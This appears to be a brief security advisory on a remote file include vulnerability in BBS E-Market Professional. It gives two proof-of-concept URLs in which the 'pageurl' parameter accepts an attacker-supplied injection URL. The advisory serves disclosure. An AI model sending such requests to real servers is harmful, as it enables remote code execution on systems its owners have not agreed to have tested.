BBS E-Market Professional Remote File Include Vulnerability

BBS E-Market Professional Remote File Include Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/becommunity/community/index.php?pageurl=[injection URL]
http://www.example.com/becommunity/community/index.php?from_market=Y&pageurl=[injection URL]